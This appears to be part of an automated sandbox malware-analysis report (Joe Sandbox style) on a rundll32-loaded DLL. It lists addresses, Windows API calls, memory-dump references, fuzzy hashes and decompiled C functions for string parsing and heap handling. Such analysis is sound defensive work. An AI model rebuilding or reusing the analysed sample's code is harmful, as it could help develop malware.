                  0x180007dbc
                  0x180007dbf
                  0x180007dc3
                  0x180007dde
                  0x180007df5
                  0x180007df8
                  0x180007dfc
                  0x180007dff
                  0x180007e0a
                  0x180007e0e
                  0x180007e0e
                  0x180007e12
                  0x180007e17
                  0x180007e19
                  0x180007e1e
                  0x180007e24
                  0x180007e2c
                  0x180007e40
                  0x180007e46
                  0x180007e4e
                  0x180007e51
                  0x180007e54
                  0x180007e5c
                  0x180007e5e
                  0x180007e65
                  0x180007e6e
                  0x180007e73
                  0x180007e78
                  0x180007e81
                  0x180007e88
                  0x180007e93
                  0x180007e9a
                  0x180007ea2
                  0x180007ea7
                  0x180007eaf
                  0x180007eb4
                  0x180007eb9
                  0x180007ecb
                  0x180007ecd
                  0x180007ed6
                  0x180007eda
                  0x180007ee2
                  0x180007eea
                  0x180007ef1
                  0x180007ef7
                  0x180007efe
                  0x180007f03
                  0x180007f0c
                  0x180007f11
                  0x180007f19
                  0x180007f25
                  0x180007f28
                  0x180007f2b
                  0x180007f30
                  0x180007f34
                  0x180007f4a
                  0x180007f54
                  0x180007f5a
                  0x180007f5c
                  0x180007f66
                  0x180007f6d
                  0x180007f76
                  0x180007f78
                  0x180007f81
                  0x180007f83
                  0x180007f93
                  0x180007f95
                  0x180007fb1
                  0x180007fb8
                  0x180007fc2
                  0x180007fca
                  0x180007fd2
                  0x180007fd7
                  0x180007fee

                  APIs
                    • Part of subcall function 0000000180001CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001CF3
                    • Part of subcall function 0000000180001CB0: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D1C
                    • Part of subcall function 0000000180001CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D77
                  • HeapFree.KERNEL32 ref: 0000000180007ECD
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180007F6D
                  • HeapFree.KERNEL32 ref: 0000000180007FC2
                  • HeapFree.KERNEL32 ref: 0000000180007FF7
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$CriticalSectionTime$AllocEnterFileLeaveSystem
                  • String ID:
                  • API String ID: 2852518528-0
                  • Opcode ID: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
                  • Instruction ID: c83ac7b05f0747d7815e629ee238b773506a9670dbf62c2a3b753bc37d6ce7c8
                  • Opcode Fuzzy Hash: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
                  • Instruction Fuzzy Hash: 09619D3270478986E7A6DF26E4447EA73A5F7987C4F408025FE8947755DF38CA59CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseEventFreeHandleHeapSleep
                  • String ID:
                  • API String ID: 1881548302-0
                  • Opcode ID: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
                  • Instruction ID: 230f4233468542b45992d4c356fbdc30eed23d9d8894d230ebd5e64d76f07138
                  • Opcode Fuzzy Hash: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
                  • Instruction Fuzzy Hash: EE011E31301A4886FEDACF52E9507AA7361FB4CFC2F489025FE5A83754EF28DA588710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E0000000118000137C(signed int __esi, long long __rbx, long long __rcx, intOrPtr* __rdx, void* __r10) {
                  				void* __rbp;
                  				intOrPtr _t29;
                  				void* _t32;
                  				void* _t38;
                  				void* _t42;
                  				void* _t54;
                  				void* _t55;
                  				intOrPtr _t56;
                  				void* _t60;
                  				void* _t61;
                  				void* _t65;
                  				signed int _t73;
                  				void* _t105;
                  				void* _t113;
                  				intOrPtr _t126;
                  				long long _t130;
                  				char* _t133;
                  				intOrPtr* _t140;
                  				long _t143;
                  				long _t145;
                  				void* _t148;
                  				void* _t150;
                  				void* _t151;
                  				intOrPtr* _t155;
                  				char* _t162;
                  				void* _t164;
                  				void* _t171;
                  				long _t173;
                  				int _t176;
                  				void* _t180;
                  				void* _t182;
                  
                  				_t164 = __r10;
                  				_t140 = __rdx;
                  				_t130 = __rcx;
                  				 *((long long*)(_t150 + 0x10)) = __rbx;
                  				 *((long long*)(_t150 + 8)) = __rcx;
                  				_t151 = _t150 - 0x60;
                  				_t126 =  *0x8000d4a0;
                  				r14d = r8d;
                  				if (r8d == 0) goto 0x8000160a;
                  				_t73 = __esi | 0xffffffff;
                  				r11d = 0;
                  				r10d = 0;
                  				_t29 =  *__rdx;
                  				if (_t29 == 0xd) goto 0x80001419;
                  				if (_t29 == 0xa) goto 0x80001419;
                  				if (0 != 0) goto 0x800013ef;
                  				if (_t29 == 0x20) goto 0x800013f1;
                  				if (_t29 == 9) goto 0x800013f1;
                  				goto 0x800013f1;
                  				if (_t29 != 0x3b) goto 0x800013fd;
                  				if (r11d != 0) goto 0x8000141d;
                  				r11d = 1;
                  				if (_t29 != 0x3d) goto 0x80001407;
                  				if (0 != 0) goto 0x8000141d;
                  				if (_t29 != 0x7c) goto 0x8000141d;
                  				if (r10d != 0) goto 0x8000141d;
                  				if (1 != 0) goto 0x8000141d;
                  				r10d = 1;
                  				goto 0x8000141d;
                  				if (1 != 0) goto 0x80001424;
                  				if (1 != 0) goto 0x800013ce;
                  				if (__rdx == _t143) goto 0x8000160a;
                  				r13d = r13d - r8d;
                  				r13d = r13d - 1;
                  				r14d = r14d + r13d;
                  				r13d = 1;
                  				if (r11d == 1) goto 0x800015fb;
                  				if (1 == 0) goto 0x80001459;
                  				r12d = 1;
                  				_t5 = _t140 - 1; // -1
                  				_t54 = _t5;
                  				goto 0x8000145c;
                  				_t173 = _t143;
                  				if (_t54 == 0) goto 0x80001605;
                  				if (r10d == 0) goto 0x800014db;
                  				_t6 = _t164 - 1; // -1
                  				_t60 = _t6;
                  				if (_t60 == 0) goto 0x800014db;
                  				_t31 =  <  ? _t60 : 0x10;
                  				if (0x10 == 0) goto 0x800014ab;
                  				r9b =  *__rdx;
                  				if (r9b == dil) goto 0x800014ab;
                  				if (r9b == 0x20) goto 0x800014ab;
                  				_t105 = r9b - 9;
                  				if (_t105 == 0) goto 0x800014ab;
                  				 *((intOrPtr*)(_t151 + 0x30 - __rdx + __rdx)) = r9b;
                  				if (_t105 != 0) goto 0x8000148c;
                  				_t61 = _t60 + 1;
                  				_t32 = ( <  ? _t60 : 0x10) - 0x10 + _t73;
                  				 *((intOrPtr*)(_t151 + _t126 + 0x30)) = dil;
                  				_t162 = _t61 + __rdx;
                  				if ( *_t162 == 0x20) goto 0x800014c6;
                  				if ( *_t162 != 9) goto 0x800014cd;
                  				goto 0x800014ba;
                  				r9b =  *((intOrPtr*)(_t151 + 0x30));
                  				_t155 = __rdx + _t126;
                  				_t55 = _t54 - _t61 + 1;
                  				goto 0x800014e3;
                  				r9b = dil;
                  				 *((intOrPtr*)(_t151 + 0x30)) = dil;
                  				_t64 =  <  ? _t55 : 0x10;
                  				r11d = 0x10;
                  				if (0x10 == 0) goto 0x80001524;
                  				_t56 =  *_t155;
                  				if (_t56 == dil) goto 0x80001524;
                  				if (_t56 == 0x20) goto 0x80001524;
                  				if (_t56 == 9) goto 0x80001524;
                  				_t14 = _t130 - 0x61; // -96
                  				_t113 = _t14 - 0x19;
                  				if (_t113 > 0) goto 0x80001518;
                  				 *((char*)(_t151 + 0x48 - _t155 + _t155)) = _t56 + 0xe0;
                  				r11d = r11d + _t73;
                  				if (_t113 != 0) goto 0x800014fc;
                  				_t65 = ( <  ? _t55 : 0x10) - r11d;
                  				 *((intOrPtr*)(_t151 + __rdx + 0x48)) = dil;
                  				if (r9b != dil) goto 0x80001546;
                  				r8d = 0x10;
                  				memcpy(_t182, _t180, _t176);
                  				if (_t173 == _t143) goto 0x80001591;
                  				if (1 <= 0) goto 0x80001568;
                  				if ( *_t173 == 0x20) goto 0x8000155f;
                  				if ( *_t173 != 9) goto 0x80001568;
                  				if (1 - 1 < 0) goto 0x80001551;
                  				if (1 == 1) goto 0x80001593;
                  				_t38 = _t148 - 1;
                  				if (_t38 <= 0) goto 0x8000158c;
                  				_t133 = _t38 + _t173 + 1;
                  				if ( *_t133 == 0x20) goto 0x80001583;
                  				if ( *_t133 != 9) goto 0x8000158c;
                  				if (_t38 + _t73 > 0) goto 0x80001579;
                  				goto 0x80001593;
                  				_t22 = _t148 + 1; // 0x1
                  				r8d = _t22;
                  				HeapAlloc(_t171, _t143, _t145);
                  				if (_t126 == _t143) goto 0x800015f8;
                  				r8d = 0;
                  				memcpy(_t148, ??);
                  				 *((intOrPtr*)(__rbx + _t126)) = dil;
                  				_t42 = E00000001180008C48(0xffffffff, _t151 + 0x48);
                  				r9d = 0;
                  				 *((long long*)(_t151 + 0x20)) = _t151 + 0x30;
                  				E00000001180005748(_t56 + 0xe0, _t42, __rbx,  *((intOrPtr*)(_t151 + 0xa0)), _t173 + 1, _t126);
                  				HeapFree(??, ??, ??);
                  				if (r14d == 0) goto 0x8000160a;
                  				goto 0x800013bb;
                  				return 0xb;
                  			}


































                  0x18000137c
                  0x18000137c
                  0x18000137c
                  0x18000137c
                  0x180001381
                  0x180001391
                  0x180001395
                  0x18000139e
                  0x1800013ab
                  0x1800013b8
                  0x1800013c8
                  0x1800013cb
                  0x1800013ce
                  0x1800013d3
                  0x1800013d7
                  0x1800013db
                  0x1800013df
                  0x1800013e3
                  0x1800013ed
                  0x1800013f3
                  0x1800013f8
                  0x1800013fa
                  0x1800013ff
                  0x180001403
                  0x180001409
                  0x18000140e
                  0x180001412
                  0x180001414
                  0x180001417
                  0x18000141b
                  0x180001422
                  0x180001427
                  0x18000142d
                  0x180001430
                  0x180001433
                  0x180001436
                  0x180001440
                  0x180001448
                  0x18000144c
                  0x18000144f
                  0x18000144f
                  0x180001457
                  0x180001459
                  0x18000145e
                  0x180001467
                  0x180001469
                  0x180001469
                  0x18000146f
                  0x18000147b
                  0x180001482
                  0x18000148c
                  0x180001492
                  0x180001498
                  0x18000149a
                  0x18000149e
                  0x1800014a0
                  0x1800014a9
                  0x1800014ab
                  0x1800014ad
                  0x1800014b2
                  0x1800014b7
                  0x1800014be
                  0x1800014c4
                  0x1800014cb
                  0x1800014cd
                  0x1800014d4
                  0x1800014d7
                  0x1800014d9
                  0x1800014db
                  0x1800014de
                  0x1800014ea
                  0x1800014ed
                  0x1800014f2
                  0x1800014fc
                  0x180001502
                  0x180001507
                  0x18000150c
                  0x18000150e
                  0x180001511
                  0x180001513
                  0x180001518
                  0x18000151f
                  0x180001522
                  0x180001524
                  0x180001527
                  0x18000152f
                  0x18000153b
                  0x180001541
                  0x180001549
                  0x18000154f
                  0x180001556
                  0x18000155d
                  0x180001566
                  0x18000156a
                  0x18000156c
                  0x180001574
                  0x180001576
                  0x18000157c
                  0x180001581
                  0x18000158a
                  0x18000158f
                  0x180001593
                  0x180001593
                  0x18000159c
                  0x1800015a8
                  0x1800015aa
                  0x1800015b5
                  0x1800015c2
                  0x1800015c6
                  0x1800015d3
                  0x1800015e0
                  0x1800015e5
                  0x1800015f2
                  0x1800015fe
                  0x180001600
                  0x180001623

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heapmemcpy$AllocFree
                  • String ID:
                  • API String ID: 1496448200-0
                  • Opcode ID: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
                  • Instruction ID: 12f6b3511e6ab994a39ab68529ae422f0e798305e72f5bbead824a43ac2e6bc8
                  • Opcode Fuzzy Hash: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
                  • Instruction Fuzzy Hash: AE811331704A8CCDFBF7C52998443E97AC2A3DD7C2FA9C121F982076D5ED648B8A8301
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 25%
                  			E00000001180001208(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long* __r9, char _a8, long long _a16, long long _a24, long long _a32, intOrPtr* _a40) {
                  				char _v48;
                  				long long _v56;
                  				long long _t43;
                  				long long _t57;
                  				long long _t58;
                  				void* _t68;
                  				long long* _t73;
                  				void* _t75;
                  
                  				_t56 = __rdx;
                  				_a16 = __rbx;
                  				_a24 = __rbp;
                  				_a32 = __rsi;
                  				_t43 =  *0x8000d4a0;
                  				r12d = r8d;
                  				_t75 = __rdx;
                  				if (__rdx == _t57) goto 0x80001304;
                  				if (r8d == 0) goto 0x80001304;
                  				EnterCriticalSection(??);
                  				asm("lock add dword [esi+0x40], 0x1");
                  				LeaveCriticalSection(??);
                  				_t7 =  &_a8; // -110
                  				r8d = 0;
                  				_v48 = 0;
                  				_a8 = 0;
                  				_v56 = _t57;
                  				if (E00000001180009994(r12d, __rdx, __rdx, _t68, _t7) != 0x7a) goto 0x800012fd;
                  				r8d = _a8;
                  				HeapAlloc(??, ??, ??);
                  				_t58 = _t43;
                  				if (_t43 == 0) goto 0x800012f8;
                  				_v48 = 0x10;
                  				_t14 =  &_a8; // -110
                  				_t73 = _t14;
                  				_v56 = __rcx + 0x72;
                  				if (E00000001180009994(r12d, _t75, _t56, _t43, _t73) != 0) goto 0x800012e8;
                  				 *__r9 = _t58;
                  				 *_a40 = _a8;
                  				goto 0x800012fd;
                  				HeapFree(??, ??, ??);
                  				goto 0x800012fd;
                  				asm("lock add dword [esi+0x40], 0xffffffff");
                  				goto 0x80001313;
                  				 *_t73 = _t58;
                  				 *_a40 = 0;
                  				return 0;
                  			}











                  0x180001208
                  0x180001208
                  0x18000120d
                  0x180001212
                  0x180001224
                  0x180001237
                  0x18000123a
                  0x180001243
                  0x18000124c
                  0x180001256
                  0x18000125c
                  0x180001265
                  0x18000126b
                  0x180001270
                  0x180001279
                  0x18000127d
                  0x180001281
                  0x180001290
                  0x180001292
                  0x18000129c
                  0x1800012a2
                  0x1800012a8
                  0x1800012ae
                  0x1800012b6
                  0x1800012b6
                  0x1800012bb
                  0x1800012d2
                  0x1800012e0
                  0x1800012e4
                  0x1800012e6
                  0x1800012f0
                  0x1800012f6
                  0x1800012fd
                  0x180001302
                  0x18000130c
                  0x180001311
                  0x180001331

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterFreeLeave
                  • String ID:
                  • API String ID: 2939682908-0
                  • Opcode ID: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
                  • Instruction ID: a0890feeee0316dd0af96136dbcc6cf79a7537e396d31e91aa434a41704444e3
                  • Opcode Fuzzy Hash: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
                  • Instruction Fuzzy Hash: 6D314232204B88C7D761CB5AE84439AF7A4F79CBD4F548115EE9983B64DF38C64ACB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E000000011800081F0(void* __edx, long long __rbx, signed short* __rcx, long long __rsi, signed int** __r8, intOrPtr* __r9, void* __r11) {
                  				signed int _t21;
                  				signed int _t28;
                  				signed int* _t38;
                  				int _t53;
                  				long long _t58;
                  				void* _t61;
                  				void* _t72;
                  				signed int* _t73;
                  				long _t75;
                  				long _t78;
                  				void* _t81;
                  
                  				 *((long long*)(_t61 + 8)) = __rbx;
                  				 *((long long*)(_t61 + 0x10)) = _t58;
                  				 *((long long*)(_t61 + 0x18)) = __rsi;
                  				_t21 =  *__rcx & 0x0000ffff;
                  				_t38 = __rbx + 4;
                  				r11d = __edx;
                  				r10d = 0x57;
                  				if (__r11 - _t38 <= 0) goto 0x800082e1;
                  				_t28 =  *(__rbx +  &(__rcx[1])) & 0x0000ffff;
                  				if (__r11 -  &(__rcx[2]) < 0) goto 0x800082e1;
                  				if (_t21 == 0) goto 0x800082e1;
                  				if (_t21 - 0x200 > 0) goto 0x800082e1;
                  				if (_t28 == 0) goto 0x800082e1;
                  				if (_t28 - 0x200 > 0) goto 0x800082e1;
                  				r15d = 0x404;
                  				HeapAlloc(_t81, _t78, _t75);
                  				_t73 = _t38;
                  				if (_t38 == 0) goto 0x800082db;
                  				memset(_t72, _t53);
                  				 *_t73 = (_t21 & 0x0000fff0) << 3;
                  				memcpy(??, ??, ??);
                  				memcpy(??, ??, ??);
                  				 *__r8 = _t73;
                  				 *__r9 = r15d;
                  				r10d = 0;
                  				goto 0x800082e1;
                  				r10d = 8;
                  				return r10d;
                  			}














                  0x1800081f0
                  0x1800081f5
                  0x1800081fa
                  0x180008213
                  0x18000821d
                  0x180008221
                  0x18000822a
                  0x180008236
                  0x18000823c
                  0x18000824b
                  0x180008253
                  0x180008260
                  0x180008264
                  0x180008268
                  0x18000826a
                  0x180008278
                  0x18000827e
                  0x180008284
                  0x18000828e
                  0x1800082b0
                  0x1800082b4
                  0x1800082ca
                  0x1800082cf
                  0x1800082d2
                  0x1800082d6
                  0x1800082d9
                  0x1800082db
                  0x180008300

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memcpy$AllocHeapmemset
                  • String ID:
                  • API String ID: 609429373-0
                  • Opcode ID: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
                  • Instruction ID: 28a7b8e95bc2ced4d8e1beef03e6e9b8fa3c41881149a4efc87acd56f6b93b28
                  • Opcode Fuzzy Hash: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
                  • Instruction Fuzzy Hash: AA21E072204B9881EB95CF57E84039A7690FB89FC4F04C425FE8A17355EE38C759C308
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memcpy$AllocHeaplstrlen
                  • String ID:
                  • API String ID: 2888080719-0
                  • Opcode ID: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
                  • Instruction ID: d7cda782a7b16298d0386595c53ef50d9ac6af49b43f80025cb93dadd90a3a02
                  • Opcode Fuzzy Hash: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
                  • Instruction Fuzzy Hash: 83219E72300B9891DB56DF17A9813E9B3A1F78CBD4F498521AE490B799DE38C68AC300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CA7
                  • memset.NTDLL(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CC1
                    • Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                  • HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CED
                  • InitializeCriticalSection.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008D3E
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocHeap$CriticalInitializeLibraryLoadSectionmemset
                  • String ID:
                  • API String ID: 2387776105-0
                  • Opcode ID: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
                  • Instruction ID: 4870de9647b4eba85a0def977afe88a726f62592237ec59ed4fc2a31fcf765aa
                  • Opcode Fuzzy Hash: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
                  • Instruction Fuzzy Hash: 80315036200B5896EB56CF12E8143DA77A5F79CBD4F888126EE8D83795EF38D609C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocHeap_snprintflstrcpylstrlen
                  • String ID:
                  • API String ID: 2416262065-0
                  • Opcode ID: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
                  • Instruction ID: cd8941c1faf9c1b72c5725e61722f5b4f1580fba6f0a1dbc367b270ebdb23bd2
                  • Opcode Fuzzy Hash: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
                  • Instruction Fuzzy Hash: 83316B36604B888BD7A5CF16E454B9AB7A5F38CBC4F048126EE9E83714DF39D545CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: FreeHeap$ErrorLast
                  • String ID:
                  • API String ID: 2332451156-0
                  • Opcode ID: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
                  • Instruction ID: 57d54ecd6ba6b12e4082159e9fbcbac62f64b62c5c275490acec5f9711af8689
                  • Opcode Fuzzy Hash: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
                  • Instruction Fuzzy Hash: D5215E72200B8882EB97DB63D5413A973A5EB8DFC4F589115EE4D93799DF38CA89C300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalSection$AllocEnterHeapLeavememcpy
                  • String ID:
                  • API String ID: 224082080-0
                  • Opcode ID: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
                  • Instruction ID: 6c58b3867655a66680f731ed639b6ca29fd0989e7b58f2a4007a8aeeb493b1ec
                  • Opcode Fuzzy Hash: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
                  • Instruction Fuzzy Hash: 20112672604B5886E751CF02F888B9AB774F398BD5F958012EA9D43B54DF38C68AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocHeaplstrlenmemcpymemset
                  • String ID:
                  • API String ID: 422472530-0
                  • Opcode ID: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
                  • Instruction ID: bc1187ca6e9429620bd200782e7290a68718eb3a581ccfc4400d3cdfedcb2126
                  • Opcode Fuzzy Hash: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
                  • Instruction Fuzzy Hash: 49014832214B8886EB45DF26A84039977A2F78CFC0F498121EE5943B15DF38E655C700
                  Uniqueness

                  Uniqueness Score: -1.00%